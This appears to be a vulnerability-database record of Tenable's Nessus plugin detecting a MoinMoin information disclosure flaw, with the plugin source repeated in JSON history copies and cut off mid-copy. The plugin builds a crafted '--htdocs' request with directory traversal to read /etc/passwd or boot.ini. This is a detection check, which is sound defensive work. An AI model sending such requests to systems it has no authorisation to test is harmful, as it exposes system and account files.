ID MOINMOIN_ARGV_INFO_DISCLOSURE.NASL Type nessus Reporter Tenable Modified 2018-06-13T00:00:00
Description
The version of MoinMoin running on the remote host has an information disclosure vulnerability. Using a specially crafted request, an unauthenticated, remote attacker can specify the directory that the application uses for its static pages and read arbitrary files from that directory, subject to the privileges under which the application runs.
Note that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI' setting to be enabled.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(44383);
script_version("1.8");
script_cvs_date("Date: 2018/06/13 18:56:28");
script_bugtraq_id(37853);
script_xref(name:"Secunia", value:"38242");
script_name(english:"MoinMoin 'sys.argv' Information Disclosure");
script_summary(english:"Tries to retrieve a local file");
script_set_attribute(
attribute:"synopsis",
value:
"A wiki application on the remote web server has an information
disclosure vulnerability."
);
script_set_attribute(
attribute:"description",
value:
"The version of MoinMoin running on the remote host has an information
disclosure vulnerability. Using a specially crafted request, an
unauthenticated, remote attacker can specify the directory that the
application uses for its static pages and read arbitrary files from
that directory, subject to the privileges under which the application
runs.
Note that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'
setting to be enabled."
);
script_set_attribute(attribute:"see_also", value:"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18");
script_set_attribute(
attribute:"see_also",
value:"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2"
);
script_set_attribute(
attribute:"see_also",
value:"http://moinmo.in/SecurityFixes"
);
script_set_attribute(attribute:"solution", value:"Upgrade to MoinMoin 1.9.1 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2010/01/18");
script_set_attribute(attribute:"patch_publication_date", value:"2010/01/19");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/02/02");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:moinmo:moinmoin");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.");
script_dependencies("moinmoin_detect.nasl", "os_fingerprint.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
script_require_keys("www/moinmoin");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
port = get_http_port(default:80);
install = get_install_from_kb(appname:'moinmoin', port:port);
if (isnull(install))
exit(1, "No MoinMoin installs on port "+port+" were found in the KB.");
url = install['dir']+'/';
res = http_send_recv3(method:"GET", item:url, port:port);
if (isnull(res)) exit(1, "The web server on port "+port+" failed to respond.");
# First figure out the name of the static page directory
pattern = '<script type="text/javascript" src="(/[^/]+)/common/js/common.js">';
match = eregmatch(string:res[2], pattern:pattern);
if (match)
static_dir = match[1];
else
exit(1, "Unable to extract static page dir from "+build_url(qs:url, port:port)+".");
os = get_kb_item("Host/OS");
if (!os || 'Windows' >< os)
{
# we'll do a dir traversal instead of providing an absolute path, which would
# require specifying a drive letter
dir['win'] = '../../../../../../../../../../../../../../../';
file['win'] = 'boot.ini';
pat['win'] = '\\[boot loader\\]';
}
if (!os || 'Windows' >!< os)
{
dir['unix'] = '/etc';
file['unix'] = 'passwd';
pat['unix'] = 'root:.*:0:[01]:';
}
# Then try to get a file outside the web root
foreach os (keys(dir))
{
url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];
res = http_send_recv3(method:"GET", item:url, port:port);
if (isnull(res)) exit(1, "The web server on port "+port+" failed to respond.");
if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))
{
if (report_verbosity > 0)
{
trailer = NULL;
if (report_verbosity > 1)
{
trailer =
crap(data:"-", length:30)+" snip "+crap(data:"-", length:30)+'\n'+
res[2]+'\n'+
crap(data:"-", length:30)+" snip "+crap(data:"-", length:30)+'\n';
}
report = get_vuln_report(items:url, port:port, trailer:trailer);
security_warning(port:port, extra:report);
}
else security_warning(port);
exit(0);
}
}
full_url = build_url(qs:install['dir'] + '/', port:port);
exit(0, 'The MoinMoin install at '+full_url+' is not affected.');
{"id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "bulletinFamily": "scanner", "title": "MoinMoin 'sys.argv' Information Disclosure", "description": "The version of MoinMoin running on the remote host has an information disclosure vulnerability. Using a specially crafted request, an unauthenticated, remote attacker can specify the directory that the application uses for its static pages and read arbitrary files from that directory, subject to the privileges under which the application runs.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI' setting to be enabled.", "published": "2010-02-02T00:00:00", "modified": "2018-06-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=44383", "reporter": "Tenable", "references": ["http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2", "http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18", "http://moinmo.in/SecurityFixes"], "cvelist": [], "type": "nessus", "lastseen": "2019-02-21T01:13:01", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:moinmo:moinmoin"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The version of MoinMoin running on the remote host has an information disclosure vulnerability. Using a specially crafted request, an unauthenticated, remote attacker can specify the directory that the application uses for its static pages and read arbitrary files from that directory, subject to the privileges under which the application runs.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI' setting to be enabled.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "08d6d67e1bf48fdcedfe1c3a782db6bd0bb02fbb81748161b9de4731db0d627c", "hashmap": [{"hash": "fe9a8063247dc1202e5c7b299bafaae5", "key": "href"}, {"hash": "c92c413cead7d8b67a89850ba352e1d1", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "published"}, {"hash": "3bc8ae7fd7de8e514651987da94469a3", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "3d3ded498434ba95a95554d0c03d27f9", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "fbaa7aaef004543abfb03afc18f36e29", "key": "description"}, {"hash": "2e3f98c5297011c43dcdc2909cdb11f9", "key": "cpe"}, {"hash": "3d64be2a10bddd78c2b3802b6ddf9f96", "key": "sourceData"}, {"hash": "1c362e980a0d97faa19e4a6d8bfcd4c6", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44383", "id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "lastseen": "2017-10-29T13:43:01", "modified": "2014-08-09T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "44383", "published": "2010-02-02T00:00:00", "references": ["http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2", "http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18", "http://moinmo.in/SecurityFixes"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2014/08/09 00:11:23 $\");\n\n script_bugtraq_id(37853);\n script_osvdb_id(61831);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2014 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "title": "MoinMoin 'sys.argv' Information Disclosure", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:43:01"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:moinmo:moinmoin"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-01-16T20:10:18", "references": [{"idList": ["MOINMOIN_DETECT.NASL"], "type": "nessus"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "fb87ef0420b96dca9fb4052d50d03f2607e45d9a2ef2c0de9be8f39de5af992a", "hashmap": [{"hash": "fe9a8063247dc1202e5c7b299bafaae5", "key": "href"}, {"hash": "1322ffe6a3b5b7adcb0ce273f3e1c8bc", "key": "sourceData"}, {"hash": "c92c413cead7d8b67a89850ba352e1d1", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "published"}, {"hash": "5299677d29a0b2004584ce465e834b3e", "key": "modified"}, {"hash": "bf6ea977edb8f3eb799754f735e780f2", "key": "description"}, {"hash": "3bc8ae7fd7de8e514651987da94469a3", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "3d3ded498434ba95a95554d0c03d27f9", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "2e3f98c5297011c43dcdc2909cdb11f9", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44383", "id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "lastseen": "2019-01-16T20:10:18", "modified": "2018-06-13T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "44383", "published": "2010-02-02T00:00:00", "references": ["http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2", "http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18", "http://moinmo.in/SecurityFixes"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\n\n script_bugtraq_id(37853);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "title": "MoinMoin 'sys.argv' Information Disclosure", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2019-01-16T20:10:18"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The version of MoinMoin running on the remote host has an information disclosure vulnerability. Using a specially crafted request, an unauthenticated, remote attacker can specify the directory that the application uses for its static pages and read arbitrary files from that directory, subject to the privileges under which the application runs.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI' setting to be enabled.", "edition": 1, "enchantments": {}, "hash": "b5bbb3dab7ad14b89ff43aa46b1d5fb61ca42b354021d3369aad8a0921350848", "hashmap": [{"hash": "fe9a8063247dc1202e5c7b299bafaae5", "key": "href"}, {"hash": "c92c413cead7d8b67a89850ba352e1d1", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "published"}, {"hash": "3bc8ae7fd7de8e514651987da94469a3", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "3d3ded498434ba95a95554d0c03d27f9", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "fbaa7aaef004543abfb03afc18f36e29", "key": "description"}, {"hash": "3d64be2a10bddd78c2b3802b6ddf9f96", "key": "sourceData"}, {"hash": "1c362e980a0d97faa19e4a6d8bfcd4c6", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44383", "id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "lastseen": "2016-09-26T17:25:57", "modified": "2014-08-09T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "44383", "published": "2010-02-02T00:00:00", "references": ["http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2", "http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18", "http://moinmo.in/SecurityFixes"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2014/08/09 00:11:23 $\");\n\n script_bugtraq_id(37853);\n script_osvdb_id(61831);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2014 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "title": "MoinMoin 'sys.argv' Information Disclosure", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:25:57"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:moinmo:moinmoin"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The version of MoinMoin running on the remote host has an information disclosure vulnerability. Using a specially crafted request, an unauthenticated, remote attacker can specify the directory that the application uses for its static pages and read arbitrary files from that directory, subject to the privileges under which the application runs.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI' setting to be enabled.", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "4573c5d521b0bf955401ef45fde1d9bdf9689ac222db5bab221885f09b5f9d79", "hashmap": [{"hash": "fe9a8063247dc1202e5c7b299bafaae5", "key": "href"}, {"hash": "1322ffe6a3b5b7adcb0ce273f3e1c8bc", "key": "sourceData"}, {"hash": "c92c413cead7d8b67a89850ba352e1d1", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "published"}, {"hash": "5299677d29a0b2004584ce465e834b3e", "key": "modified"}, {"hash": "3bc8ae7fd7de8e514651987da94469a3", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "3d3ded498434ba95a95554d0c03d27f9", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "fbaa7aaef004543abfb03afc18f36e29", "key": "description"}, {"hash": "2e3f98c5297011c43dcdc2909cdb11f9", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44383", "id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "lastseen": "2018-06-14T11:46:45", "modified": "2018-06-13T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "44383", "published": "2010-02-02T00:00:00", "references": ["http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2", "http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18", "http://moinmo.in/SecurityFixes"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\n\n script_bugtraq_id(37853);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n 